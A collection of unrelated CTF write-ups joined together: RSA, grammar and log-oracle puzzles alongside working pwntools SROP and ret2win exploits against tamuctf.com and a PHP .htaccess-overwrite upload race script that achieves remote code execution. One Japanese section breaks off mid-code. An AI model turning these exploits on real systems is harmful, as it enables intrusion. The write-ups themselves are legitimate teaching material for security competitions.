pow(5, x, n) = 7x->3916704810437927145600864918236836170491099995953699168541731264707734332610664820402524451306018121752526504056848858498261740094610196113519273038900804576322610451175905222231364299872297068281255941214365432478262573598957328534058633443808701127122560630454143760365394739477719428783885592620907691725814382 pow(2, x, n) = 9x->3754939778354158910107789877335886849355087278630804477809002556307824523516424124875830766489409359374346298779402434539775766276216233569237231723341252968455894584408143678496101610613389877101646294181565422615598678053423609327485531311004778211836628609338110226534895570202818439605250908707603466887326390 pow(4, x, n) = 9x->1877469889177079455053894938667943424677543639315402238904501278153912261758212062437915383244704679687173149389701217269887883138108116784618615861670626484227947292204071839248050805306694938550823147090782711307799339026711804663742765655502389105918314304669055113267447785101409219802625454353801733443663195 pow(5, x, n) = 4x->1409828699698033208091409044455165366643801419932373553123260771987699896353688393694756863763560622086506122042233901651495199885942636834433947550336356542178907165298626723075515405354701129627152693478823016506389518956567226250580121882030622556782873851604640300443552173844660124075798887496649067556217390 pow(6, x, n) = 2x->939292781082112016281996120029640558513504271209074729744679536785999346698143634739122352482233665730748662161995597875421203578208037954730627469631250345432329905035343676336544953322597208540536869444672643207916253721052582779000448220996637632239183670918288993354842447149274646102688185469428348953985987 pow(5, x, n) = 3x->2133766932864388673682415264428852563157697531212805381722606537415880821651881836036219743693469157186116448622886351607608930829881035994695888699244352664133706885871664208865202356948720814126562878822367646312138979081062675067312895961013235414261084030444892478136847891250703661546259439777289170770933244 pow(6, x, n) = 9x->2670949225838281399597073379098730303583513127029718654238792244703169694689697203670777297918496286039620854977764160874073336293101055555722846666785515585641867262589018571544118060277263519799220137287824554688761181884032497133312272175175834832173932687655395876399375844129714571680642955891508395107160026 pow(7, x, n) = 4x->782048530527862007921345086825967824809921804253677698357640394456486443141294396991806703662463153174674499822712272620352264740247063132442983714411111748779418558073361927132656469123102907840771323625012596232213516808553077385813641065260507991821817461035116755889737568582054061118287348291920439180743213 pow(8, x, n) = 3x->1384079094392777390378142582748983044994268158013112098589525645763832151933734766337475461562062162812577413013526298527448584954288894172403555554898211540827070276177974933785551596255974635663656695059789210620032061229926878669799783321362314718081488106471680681607326051438513717248545039256328093317076398 pow(6, x, n) = 8x->2817878343246336048845988360088921675540512813627224189234038610357998040094430904217367057446700997192245986485986793626263610734624113864191882408893751036296989715106031029009634859967791625621610608334017929623748761163157748337001344662989912896717551012754866980064527341447823938308064556408285046861957961 pow(5, x, n) = 9x->4267533865728777347364830528857705126315395062425610763445213074831761643303763672072439487386938314372232897245772703215217861659762071989391777398488705328267413771743328417730404713897441628253125757644735292624277958162125350134625791922026470828522168060889784956273695782501407323092518879554578341541866488 pow(3, x, n) = 7x->2108313327065898035640892415345563086173030498575489939276428678662590490764646819880954837849939911577079891606499075752927419013712227778532427019242881857120209568990729106084788120925368694053101846896564389670119774572485264744679044261124989413694839721244251831062925927717237690766950273365675428680548680 pow(2, x, n) = 6x->4152237283178332171134427748246949134982804474039336295768576937291496455801204299012426384686186488437732239040578895582345754862866682517210666664694634622481210828533924801356654788767923906990970085179367631860096183689780636009399349964086944154244464319415042044821978154315541151745635117768984279951229195 pow(7, x, n) = 3x->302667136777917447885639399855798746783792281082047426137560224394234690761198213214781903275125974443412434383258389499537763965208434880475329103516951799391535587982643066857765962424901807944918698865193821688853878387134235170443608989618620354405251870857636073985822876614487518015398151778674906411808601 pow(6, x, n) = 4x->1878585562164224032563992240059281117027008542418149459489359073571998693396287269478244704964467331461497324323991195750842407156416075909461254939262500690864659810070687352673089906645194417081073738889345286415832507442105165558000896441993275264478367341836577986709684894298549292205376370938856697907971974 pow(8, x, n) = 6x->2900590690393612534431831122468320185197775381162401469832242751855554947962396257387149462523050035312950139447444750735753832770794604660798256090247550299662579300397876908524620918563460614623754653785512490988229957671972766233570839527085351416965588116302338635977012964247935005210551481533116457655453731 pow(6, x, n) = 3x->3610242006920393415879069499128370862097017398238793383983471781489169041387840838409899650400729951770369517139759758749494539871309093510453474136416765931074197167624362247880663013599860728339757006732497197896677435605085079912312720396172472464413116358573684869754218291278989217783331141360936744061146012 pow(3, x, n) = 4x->1363952586418552326838027389457770381128348610341916654151049344040269791768048789580711074747324279253953986869951673094759791136335614290642926045930520993156736257909660908648437081973019508017016877769804013904226195162132557973767673754417051913608582789200470895254896416316547292509925572389642012264907490 pow(7, x, n) = 9x->605334273555834895771278799711597493567584562164094852275120448788469381522396426429563806550251948886824868766516778999075527930416869760950658207033903598783071175965286133715531924849803615889837397730387643377707756774268470340887217979237240708810503741715272147971645753228975036030796303557349812823617202 pow(2, x, n) = 7x->1711445377659847937601048743127792894663395582035721437850764667958715668936426339862746933835485061086301989324627651083245932409004488051470920327234756771433694118073902607544207633552099991451060285991062573131579425718487903656405450657236154345643778100618362544607755400925661988243449576179608268106517192 pow(8, x, n) = 9x->2768158188785554780756285165497966089988536316026224197179051291527664303867469532674950923124124325625154826027052597054897169908577788344807111109796423081654140552355949867571103192511949271327313390119578421240064122459853757339599566642724629436162976212943361363214652102877027434497090078512656186634152796 pow(6, x, n) = 7x->4382451963215414951923427484295917714075099595415988392264685392449057783423441922126020145423600985804385331915992918388410803253438498450309874925605271432370368439308396818520118534947166364332426731242512326875404549273011444416465627832281990548624424694040059123529752908838818278511190008322930537534907342 pow(9, x, n) = 4x->681976293209276163419013694728885190564174305170958327075524672020134895884024394790355537373662139626976993434975836547379895568167807145321463022965260496578368128954830454324218540986509754008508438884902006952113097581066278986883836877208525956804291394600235447627448208158273646254962786194821006132453745 pow(8, x, n) = 4x->3033023192001670288107377079438674280407014446298578742485434212183445592057322982099348001921975745000745452867836904416610495633011420976789401070698677517671018048439803949478138644614971957920195917451446560736395792884091775127542112411446073397768200019661315908739373825618842575924012884553576728676754666``` It's quite long, but after analyze, we recognize that, we actually need 3 arguments and last expression + `n=9099069576005010864322131238316022841221043338895736227456302636550336776171968946298044005765927235002236358603510713249831486899034262930368203212096032559091664507617383780759417104649503558521835589329751163691461155254201486010636703570864285313772976190442467858988008292898546327400223671343777884080302269` + `e = 65537` + `c = 7721448675656271306770207905447278771344900690929609366254539633666634639656550740458154588923683190330091584419635454991419701119568903552077272516472473602367188377791329158090763546083264422552335660922148840678536264063681459356778292303287448582918945582522946194737497041408425657842265913159282583371732459` last expression: ```txtpow(8, x, n) = 4x->3033023192001670288107377079438674280407014446298578742485434212183445592057322982099348001921975745000745452867836904416610495633011420976789401070698677517671018048439803949478138644614971957920195917451446560736395792884091775127542112411446073397768200019661315908739373825618842575924012884553576728676754666``` The reason we choose the last expression is because it is a clue for us to find phi(n), specifically as follows: We have : `8^x = 4 (mod n)` or `2^{3x-2} = 1 (mod n)` No we will analyze a litte bit about number of digit of `n` and `phi(n)` We found that: Number of digits of `n` approxiate Number of digits of `phi(n)` ~~~Because: n = p*q and phi(n) = (p-1)(q-1) ~ pq = n~~~ And now, we continue see that: `3x-2` has approxiate `n` , so we boldly guess that `3x-2` is `phi(n)` And luckily, Finally we get the flag, detail as follow: We have: `ed = 1 (mod phi(n))`, with `phi(n)=3x-2` So we will easily find `d` and `flag = c^d (mod n)` And this is my solution: ```pyfrom Crypto.PublicKey import RSA from Crypto.Util.number import bytes_to_long,long_to_bytes import random import binascii n = 9099069576005010864322131238316022841221043338895736227456302636550336776171968946298044005765927235002236358603510713249831486899034262930368203212096032559091664507617383780759417104649503558521835589329751163691461155254201486010636703570864285313772976190442467858988008292898546327400223671343777884080302269 e = 65537 c = 7721448675656271306770207905447278771344900690929609366254539633666634639656550740458154588923683190330091584419635454991419701119568903552077272516472473602367188377791329158090763546083264422552335660922148840678536264063681459356778292303287448582918945582522946194737497041408425657842265913159282583371732459 x = 3033023192001670288107377079438674280407014446298578742485434212183445592057322982099348001921975745000745452867836904416610495633011420976789401070698677517671018048439803949478138644614971957920195917451446560736395792884091775127542112411446073397768200019661315908739373825618842575924012884553576728676754666 phi_n = 3*x-2 d = pow(e,-1,phi_n) flag = pow(c,d,n) print(long_to_bytes(flag))``` And we get result: ~~~@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@crew{d15cr373_l06_15_r3duc710n_f0r_f4c70r1n6}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@~~~ And flag is: ~~~crew{d15cr373_l06_15_r3duc710n_f0r_f4c70r1n6}~~~
## Grammar Nazi > The flag is in format `dctf{7_4_2_3_7_4}` where numbers represent number of characters between underscores. For clarification: you will get the whole flag as a result, including the `dctf{}` part. ### Files[cfg.zip](https://wiki.fuo.fi/ctf/dragonsec-2022/grammar-nazi/cfg.zip) ### What's going on? We have `cfg.zip`, which contains 2134 folders. An example of the structure is shown below: ![](https://wiki.fuo.fi/ctf/dragonsec-2022/grammar-nazi/gabibbo-tree.png) - Some folders contain only subfolders. Subfolders name is not random: subfolders have the same name of a folder from the upper layer.- Some folders contain only `<letter>.txt` files.- Some folders contain both `txt` files and subfolders. Between challenge tags, we saw `context-free-grammar`. In order to make the solution more understandable, we briefly introduce what a context free grammar is. ### Context free grammarA context free grammar is a formal grammar which is used to generate all possible strings in a given formal language. Sentences are not influenced by context, but only by a set of rules, which define the syntax and the structure of sentences in these languages. Context free grammars have the following components: - A set of **terminal symbols** which are the characters that appear in the language/strings generated by the grammar (e.g. characters, words etc). Terminal symbols never appear on the left-hand side of the production rule and are **always** on the right-hand side. - A set of **non-terminal** symbols (or variables), which are placeholders for patterns of terminal symbols that can be generated by the non-terminal symbols. These are the symbols that will always appear on the left-hand side of the production rules, though they can be included on the right-hand side. The strings that a CFG produces will contain only symbols from the set of nonterminal symbols. - A **set of production rules** which are the rules for replacing nonterminal symbols. Production rules have the following form: $variable \rightarrow string$ (of variables and terminals). - A **start symbol** $S$, which is a special non-terminal symbol that appears in the initial string generated by the grammar. To create a string from a context-free grammar, we follow these steps: - Begin the string with a start symbol $S$. - Apply one of the production rules to the start symbol on the left-hand side, by replacing the start symbol with the right-hand side of the production. - Repeat the process of selecting nonterminal symbols in the string, and replacing them with the right-hand side of some corresponding production, _until all non-terminals have been replaced by terminal symbols_. Note, *it could be that not all production rules are used*. #### ExampleGiven the following rules```S --> nounPhrase verbPhrasenounPhrase --> adj nounverbPhrase --> verb nounPhraseadj --> thenoun --> monkey | bananaverb --> ate``` We consider: - Terminal symbols: `the`, `monkey`, `banana`, `ate`- Non terminal symbols: `nounPhrase`, `verbPhrase`, `adj`, `noun`, `verb`- Start symbol: `S` We substitute in this way:```S --> adj noun verb nounPhrase --> adj noun verb adj noun --> the <monkey | banana> ate the <monkey | banana> --> the monkey ate the banana```### Solution We found out folders were non-terminal symbols, and files with letters and numbers with `.txt` inside some folders were terminal symbols. We understood we had to replace all the folders with their content. This action could be recursive in case of more subdirectories in directory. First, we got the `cfg` folder tree: ```bashtree . > tree.txt``` Applying what we understand from Context Free Grammar: - Start symbol is the `S` folder.- Terminal symbols are `.txt` files, which will compose our flag.- Non-terminal symbols are folders and subfolders.- Rules consist in substituting all folders with their content, recursively. ![](https://wiki.fuo.fi/ctf/dragonsec-2022/grammar-nazi/gabibbo-s.png) - We can see `S` contains seven times `ZC` folders - Flag format is `dctf{7_4_2_3_74}`, which has seven symbols (`{` `}` and five `_`)- `ZC` contains `AMT/`, `HC/`, `XL/` - `AMT -> }.txt` (the last `ZC` is `}`) - `HC -> {.txt` (the first `ZC` is `{`) - `XL -> _.txt` (the middle `ZC` are `_`) - `CZ` will be `dctf` (warning: the characters are in the wrong order!) And so on. We just `Ctrl + F` on `tree.txt` file, ordered the characters, and got the flag: > `dctf{c0nt3xt_fr33_15_n07_m34n1ng_fr33}` ### Learning sources Thanks to the authors of these sources, who helped us understand better how context free grammar works:- [https://brilliant.org/wiki/context-free-grammars/](https://brilliant.org/wiki/context-free-grammars/)- [https://www.freecodecamp.org/news/context-free-grammar/](https://www.freecodecamp.org/news/context-free-grammar/)- [https://shiffman.net/a2z/cfg/](https://shiffman.net/a2z/cfg/)
# Original witeup [here](https://hackappatoi.github.io/void/) This is the output of checksec over the ELF of this challenge. ```Arch: amd64-64-littleRELRO: No RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x400000)``` This was a cool little srop challenge! the source code of this challenge was very tiny. This was the description "Can't exploit it if there isn't anything to exploit, right? NX, no libc, what else even can you do?!" ```cvoid main() { asm ( "mov $0, %rax;" "mov $0, %rdi;" "mov %rsp, %rsi;" "mov $2000, %rdx;" "syscall;" );} int _start() { main(); asm( "mov $60, %rax;" "mov $0, %rdi;" "syscall;" );}``` As we can see the binary will read 2000 byte directly into the stack. There was only few gadget usefulbut there was a syscall gadget, and this, with this gadget we can perform srop since also the number of bytes read is enough for this technique. In order to perform this technique is required a syscall gadged and a way to set the rax register.In this binary we haven't a direct pop rax gadget, but we can set the rax value using th return of the read syscall. This technique abuses of the ```sigreturn``` syscall (id is 15 for 64 bit ). This syscall usually restore the register state after a signal handler returns. So usually is never directly called by a user. The stack contain the sigcontext structures that contain all the registers, so if we can write enough byte in the stack we can control all the registers value. Pwntools has some useful function that create a sigreturn frame (sigcontext) that will contain the value of the registers. My first plan was to call mprotect and then inject a shellcode, but then I have only called execve with /bin/sh. So I have used the first SigreturnFrame to perform a stack pivot, so is not very elegant but it works! After te first syscall (mprotect) the rsp point to a well know address and now I can point to the b'/bin/sh\x00' located at the end of the second sigreturn frame (execve) This is my exploit ```pythonfrom pwn import * context.binary = elf = ELF('./void') #p = elf.process()#gdb.attach(p)p = remote("tamuctf.com", 443, ssl=True, sni="void") base_address_text = 0x400000 sys_ptr = 0x0000000000401018syscall = p64(sys_ptr)vuln = p64(elf.sym.main) vuln_ptr = next(elf.search(b'\x00\x10\x40')) # ptr prt to mainbin_addr = 0x400198 #searched in gdb since now the stack position is known frame_mprotect = SigreturnFrame(kernel = 'amd64')frame_mprotect.rax = 0x0aframe_mprotect.rdi = base_address_textframe_mprotect.rsi = 0x2000frame_mprotect.rdx = 6#7frame_mprotect.rsp = vuln_ptrframe_mprotect.rip = sys_ptr frame_execve = SigreturnFrame(kernel = 'amd64')frame_execve.rax = 0x3bframe_execve.rdi = bin_addrframe_execve.rsi = 0frame_execve.rdx = 0frame_execve.rip = sys_ptr payload = vuln + syscall + bytes(frame_mprotect) p.sendline(payload)log.info('Press any key')input()p.sendline(payload[8:8+14]) #set rax to 0xflog.info('Press any key')input()payload = vuln + syscall + bytes(frame_execve) +b'/bin/sh\x00'p.sendline(payload)log.info('Press any key')input()p.sendline(payload[8:8+14]) #set rax to 0xf p.interactive()``` and this is the output: ```texteurus@node-01-00:~/Scaricati/void$ python3 solver-template.py [*] '/home/eurus/Scaricati/void/void' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[+] Opening connection to tamuctf.com on port 443: Done[*] Press any key [*] Press any key [*] Press any key [*] Switching to interactive mode$ lsdocker_entrypoint.shflag.txtvoid$ cat flag.txtgigem{1_6u355_7h475_h0w_w3_3xpl017_17}$ [*] Interrupted[*] Closed connection to tamuctf.com port 443```
It is pretty easy to find the flag with *Wireshark* by reading tcp streams in **Analyze->Streams**, but we can do the same with *tshark*, the cli version: ```console[user@host Eavesdrop]$ tshark -r capture.flag.pcap -q -z conv,tcp================================================================================TCP ConversationsFilter:<No Filter> | <- | | -> | | Total | Relative | Duration | | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |10.0.2.15:57876 <-> 10.0.2.4:9001 17 1 330bytes 18 1 411bytes 35 2 741bytes 15,175413000 224,240210.0.2.15:43928 <-> 35.224.170.84:80 5 442bytes 5 377bytes 10 819bytes 165,383043000 0,562310.0.2.15:56370 <-> 10.0.2.4:9002 4 272bytes 4 320bytes 8 592bytes 205,301478000 11,8833================================================================================``` There are three conversations to read, so lets read them: ```consoleuser@host Eavesdrop]$ tshark -r capture.flag.pcap -q -z follow,tcp,ascii,0 ===================================================================Follow: tcp,asciiFilter: tcp.stream eq 0Node 0: 10.0.2.15:57876Node 1: 10.0.2.4:9001 41Hey, how do you decrypt this file again? 16You're serious? 18Yeah, I'm serious 83*sigh* openssl des3 -d -salt -in file.des3 -out file.txt -k supersecretpassword123 19Ok, great, thanks. 47Let's use Discord next time, it's more secure. 51C'mon, no one knows we use this program like this! 10Whatever. 5Hey. 6Yeah? 41Could you transfer the file to me again? 25Oh great. Ok, over 9002? 17Yeah, listening. 8Sent it 8Got it. 20You're unbelievable ===================================================================``` ```console[user@host Eavesdrop]$ tshark -r capture.flag.pcap -q -z follow,tcp,ascii,1 ===================================================================Follow: tcp,asciiFilter: tcp.stream eq 1Node 0: 10.0.2.15:43928Node 1: 35.224.170.84:8087GET / HTTP/1.1Host: connectivity-check.ubuntu.comAccept: */*Connection: close 148HTTP/1.1 204 No ContentDate: Mon, 04 Oct 2021 18:08:52 GMTServer: Apache/2.4.18 (Ubuntu)X-NetworkManager-Status: onlineConnection: close ===================================================================``` ```console[user@host Eavesdrop]$ tshark -r capture.flag.pcap -q -z follow,tcp,ascii,2 ===================================================================Follow: tcp,asciiFilter: tcp.stream eq 2Node 0: 10.0.2.15:56370Node 1: 10.0.2.4:900248Salted__............=a.....Z..........F8..v.<8EY===================================================================``` We can skip the second one, because it does not contain anything interesting. The first one shows us a literal conversation with a cool command and credentials included. The third is a secret to decrypt. So we have to save the secret properly, because the **ascii** output of thark is replacing non-printable characters with dots. We will use the **raw** option with some pipes to remove obsolete text and transform the message to real raw data: ```console[user@host Eavesdrop]$ tshark -r capture.flag.pcap -q -z follow,tcp,raw,2 | tail -n +7 | head -n 1 | xxd -r -p > secret ``` Last step, decryption: ```console[user@host Eavesdrop]$ openssl des3 -d -salt -in secret -k supersecretpassword123*** WARNING : deprecated key derivation used.Using -iter or -pbkdf2 would be better.picoCTF{nc_73115_411_5786acc3}[user@host Eavesdrop]$ ```
# Web - Uploadz ## Challenge I think this site safe from upload file, prove me wrong please.https://uploadz-web.crewctf-2022.crewc.tf/ ## First observations and ideas The given website prompts you with a simple upload form. There are almost no upload restrictions in place. To start off I took a quick look at the source code.A few things are apparent from the first look: - The server is running apache2- It uses PHP as the preprocessing language I started tampering around with the upload form using Burp Suite, but my first idea of using file name path traversal was quickly annihilated by line 29 in the source code. ```php$fileName = basename($_FILES['uploadedFile']['name']);``` The `basename` function prevents any kind of filename traversal in this case. Executing previously uploaded `.php` files was also prevented by the .htaccess in the root folder, which renders the index file if a file ending with `.php` is viewed. ```js RewriteCond %{REQUEST_FILENAME} -f RewriteCond %{REQUEST_FILENAME} \.php$ RewriteRule !^index.php index.php [L,NC]``` Renaming the file to `.php5`, `.pHp`, `...` also didn't work. ## Forming the solution To get a better understanding of the code I cleaned it up and gave the variables describing names. ```php <form action="/" method="post" enctype="multipart/form-data">Select image to upload: <input type="file" name="uploadedFile" id="fileToUpload"><input type="submit" value="Upload Image" name="submit"> </form>``` The `copyToTempFolder` function seemed very suspicious to me, so I took a closer look at it. It copies the uploaded file from the default PHP temp directory to a separate public `/temp` directory. The file in the public `/temp` directory is deleted after one second. Interestingly enough, the filename in this directory is defined by the user, while the filename in the public `/uploads` directory gets prefixed with a random UUID. This means, that I can tamper with the filename in the public `/temp` folder. After some time, I came up with the idea of overwriting the `.htaccess` in the `/temp` directory. This would allow me to execute PHP scripts for a time frame of one second in it. I crafted a new `.htaccess` file, which would allow me to execute files ending with `.pwn` as PHP files. ### .htaccess ```AddType application/x-httpd-php .pwn``` Then I wrote a script to perform the exploit, as the time interval of one second was too short to perform the exploit by hand (Also coding is more fun). The plan was to - Upload the .htaccess overwrite- Upload the PHP payload as a .pwn file- Execute the payload- Retrieve the data from the payload ### index.ts ```tsimport axios from 'axios';import FormData from 'form-data';import fs from 'fs'; const baseUrl = 'https://uploadz-web.crewctf-2022.crewc.tf';const tempPath = 'storage/app/temp';const exploits = { htaccess: { path: 'pwn/.htaccess', name: '.htaccess' }, payload: { path: 'pwn/main.pwn', name: 'main.pwn' },}; // Upload .htaccess Overwriteconst overwriteConfigFile = async () => { const form = new FormData(); const htaccess = fs.readFileSync(exploits.htaccess.path); form.append('uploadedFile', htaccess, exploits.htaccess.name); axios.post(baseUrl, form.getBuffer(), { headers: { ...{ 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1', }, ...form.getHeaders(), }, });}; // Upload Payloadconst uploadPayload = async () => { const form = new FormData(); const exploit = fs.readFileSync(exploits.payload.path); form.append('uploadedFile', exploit, exploits.payload.name); axios.post(baseUrl, form.getBuffer(), { headers: { ...{ 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1', }, ...form.getHeaders(), }, });}; // Execute Payloadconst executePayload = async () => { const payloadResponse = await ( await axios.get(`${baseUrl}/${tempPath}/${exploits.payload.name}`) ).data; return payloadResponse;}; const main = async () => { // Schedule overwriteConfigFile(); uploadPayload(); setTimeout(async () => { const response = await executePayload(); console.log(response); }, 500);}; main();``` ### main.pwn ```php ``` ## Extracting the flag And sure enough, I could execute my payload as a PHP script and retrieve the flag from the root directory of the web server. ```array(21) { [0]=> string(4) "/bin" [1]=> string(5) "/boot" [2]=> string(4) "/dev" [3]=> string(4) "/etc" [4]=> string(9) "/flag.txt" [5]=> string(5) "/home" [6]=> string(5) "/kctf" [7]=> string(4) "/lib" [8]=> string(6) "/lib64" [9]=> string(6) "/media" [10]=> string(4) "/mnt" [11]=> string(4) "/opt" [12]=> string(5) "/proc" [13]=> string(5) "/root" [14]=> string(4) "/run" [15]=> string(5) "/sbin" [16]=> string(4) "/srv" [17]=> string(4) "/sys" [18]=> string(4) "/tmp" [19]=> string(4) "/usr" [20]=> string(4) "/var"}string(28) "crewctf{upload_rce_via_race}"``` The flag was `crewctf{upload_rce_via_race}` ! # ? © Copyright 2022 - [@choozn](https://choozn.dev)
与えられるプログラムより,パスワードは8文字で合計すると713,??ABBACC 形式,特殊文字は使用しないようです.正規表現にすると`r'([A-z0-9][A-z0-9]([A-z0-9])([A-z0-9])\3\2([A-z0-9])\4)'`のようになります. 私はまずこのようなプログラムを書きましたが数十万個のパスワード候補が出てしまいました. ```pyif __name__ == "__main__": alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" for c1 in tqdm(alphabet): for c2 in alphabet: for c3 in alphabet: for c4 in alphabet: for c5 in alphabet: password = f"{c1}{c2}{c3}{c4}{c4}{c3}{c5}{c5}" if check(password): print(password)``` [regex word search site](http://thewordsword.com/)にもそのような単語はなく,かなり悩んだ末,問題文とDiscordをよくみました. > remember this is a themed ctf, the answer is NOT random> Its a famous thing from the US Space Program(discord) 「US Famous Space Program」で検索すると[List of space programs of the United States](https://en.wikipedia.org/wiki/List_of_space_programs_of_the_United_States)が出てきます.しかしこのページのテキストには上記の正規表現に一致する単語はありません.そこで,私はwikipediaをクロールすることにしました.プログラムはこれです. ```pyimport requestsimport refrom tqdm import tqdmurl = "https://en.wikipedia.org/wiki/List_of_space_programs_of_the_United_States" html = requests.get(url).text href = re.findall(r'
```from pwn import *p = remote("tamuctf.com", 443, ssl=True, sni="trivial")elf = context.binary = ELF('./trivial') def exploit(): addr_win = p64(elf.symbols.win) buffer = b"A"*88 payload = buffer + addr_win p.sendline(payload) p.interactive() exploit()#gigem{sorry_for_using_the_word_trivial}``` Simple ret2win
**Full write-up (+files):** [https://www.sebven.com/ctf/2022/04/12/HackPackCTF2022-Repeating-Offense.html](https://www.sebven.com/ctf/2022/04/12/HackPackCTF2022-Repeating-Offense.html) Cryptography – 443 pts (20 solves) – Chall author: Polymero (me) One-time oracles using RSA or Paillier are not a great idea due to those slippery mathemagicians… I would like to see them slip their way through RSA AND Paillier! After all, you cannot rob two banks at the same time. … What? nc cha.hackpack.club 10996 or 20996 Files: repeatingoffense.py This challenge was part of my guest appearance on HackPack CTF 2022.
We are given a .tar that contains two .txt files, one containing users and the other the passwords. Using grep i found the line where the user is.```shell❯ grep -ni cultiris usernames.txt378:cultiris```Then i printed the password in that line using awk.```shell❯ awk '{if(NR==378) print $0}' passwords.txtcvpbPGS{P7e1S_54I35_71Z3}```It looks like rot13, so i deciphered it.```shell❯ awk '{if(NR==378) print $0}' passwords.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'picoCTF{C7r1F_54V35_71M3}```
# DCTF 2022 - UseForce ## Introduction - We are given a file, `app-release.apk` and a hint: `'Are Dragons Bulletproof?'`. - I have never worked with an APK file as, my RE skills have never expanded beyond the classic PE/EXE. Really stepped out of my comfort zone for this one. Which I am glad I did. ## Intiital research - We can use [apktool](https://ibotpeaches.github.io/Apktool/) to unzip and have a look at source files. - This really didn't offer much help, except looking at the [.smali](https://mobsecguys.medium.com/smali-assembler-for-dalvik-e37c8eed22f9) files. - Smali is the assembly code for Android's VM. - We can use [ByteCode-Viewer](https://github.com/Konloch/bytecode-viewer) to disassemble the package and see the code in java syntax which made reading the code much easier. Comparison: ##### Smali (app-release/com/dctf/useforce/MainActivity$2.smali) ``` smali .class Lcom/dctf/useforce/MainActivity$2; .super Ljava/lang/Object; .source "MainActivity.java" # interfaces .implements Landroid/view/View$OnClickListener; # annotations .annotation system Ldalvik/annotation/EnclosingMethod; value = Lcom/dctf/useforce/MainActivity;->onCreate(Landroid/os/Bundle;)V .end annotation .annotation system Ldalvik/annotation/InnerClass; accessFlags = 0x0 name = null .end annotation # instance fields .field final synthetic this$0:Lcom/dctf/useforce/MainActivity; .field final synthetic val$editText:Landroid/widget/EditText; # direct methods .method constructor <init>(Lcom/dctf/useforce/MainActivity;Landroid/widget/EditText;)V .locals 0 .line 45 iput-object p1, p0, Lcom/dctf/useforce/MainActivity$2;->this$0:Lcom/dctf/useforce/MainActivity; iput-object p2, p0, Lcom/dctf/useforce/MainActivity$2;->val$editText:Landroid/widget/EditText; invoke-direct {p0}, Ljava/lang/Object;-><init>()V return-void .end method # virtual methods .method public onClick(Landroid/view/View;)V .locals 2 .line 49 new-instance p1, Ljava/lang/StringBuilder; invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V const-string v0, "check: " invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; iget-object v0, p0, Lcom/dctf/useforce/MainActivity$2;->this$0:Lcom/dctf/useforce/MainActivity; iget-object v1, p0, Lcom/dctf/useforce/MainActivity$2;->val$editText:Landroid/widget/EditText; invoke-virtual {v1}, Landroid/widget/EditText;->getText()Landroid/text/Editable; move-result-object v1 invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String; move-result-object v1 invoke-virtual {v0, v1}, Lcom/dctf/useforce/MainActivity;->a(Ljava/lang/String;)Ljava/lang/String; move-result-object v0 invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String; move-result-object p1 const-string v0, "MainActivity" invoke-static {v0, p1}, Landroid/util/Log;->w(Ljava/lang/String;Ljava/lang/String;)I return-void .end method ``` ##### Java (app-release/com/dctf/useforce/MainActivity$2.class) ``` java package com.dctf.useforce; import android.util.Log; import android.view.View; import android.widget.EditText; class MainActivity$2 implements View.OnClickListener { final MainActivity this$0; final EditText val$editText; MainActivity$2(MainActivity var1, EditText var2) { this.this$0 = var1; this.val$editText = var2; } public void onClick(View var1) { StringBuilder var2 = new StringBuilder(); var2.append("check: "); var2.append(this.this$0.a(this.val$editText.getText().toString())); Log.w("MainActivity", var2.toString()); } } ```- We can emulate the Android package with [Anbox](https://anbox.io/).- We can also interface with that emultaor using [adb](https://developer.android.com/studio/command-line/adb).- This has us at a good spot. We can now look at source, disassemble byte-code, emulate the package, and interact with the emulator / application. ## Setup - We install the tools via the steps supplied on the sites we visited.- We can then install the app with the command: `sudo adb install app-release.apk`.- Open `anbox` and launch the `useforce` application.- We can see the emulator is up by running the command: `adb devices`. ``` bash $ adb devices List of devices attached emulator-5558 device ```- Launching the application we are greeted with a somewhat simple flag checker: ![first launch](images/application_launched.png) ## The Fun Part: Reversing the Applicaiton- First thing to do is see how the application responded to input. We input text, click check, and nothing happens. Not a very exciting first experience.- Using the disassembler, `Bytecode-Viewer`, not much stuck out inititally, except for one line: ``` java import android.util.Log; ```- I attempted to connect to the process for debugging with adb, but had no luck.- Next thing to do is try and search for logs the application is writing to- adb has a command which allows us to read system logs: `logcat`.- We use the command and can see usefule data:![logcat first](images/logcat_first.png)- We can see the application is writing to these logs and of use we see: `UseForce: you're too short or to long!`- We can carve out these specific log entries for the application with the command: `adb shell logcat | grep "UseForce"`- Next step is to see if we can determine the length of the flag. This is can be done by iterively adding a character until something in the logs change: ![found length](images/found_length.png)- We found the length of the flag is 23 characters.- We also know the given format for the flag will start with `dctf{` and ends with `}`.![partial_flag](images/some_flag_correct.png)- We notice in the logs something changes. At indexes `0,1,2,3,4` and `22`, the value changes from `0` to `1`. We can assume this is the program logging we have the characters at those indexes correct. That's a good sign. The challenge gets significantly easier from here and isn't as much of a 'black box' anymore. - We know from the flag format, the format inside the brackets will be any of the following characters: `ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-`.- Now we can iterate through the indexes of the flag and try each character until all indexes reflect `1` or we are given some sort of `success` message in the logs.- Luckily [pwntools](https://docs.pwntools.com/en/stable/adb.html) has an adb framework baked in that we can use.- Next we create a program to interact with the application to change the flag, check it, then repeat the process over and over until it is correct! ![solved](images/solved.png) - I came up with three iterative solutions (`slow_solpy`, `fast_sol.py`, `fastest_sol.py`).
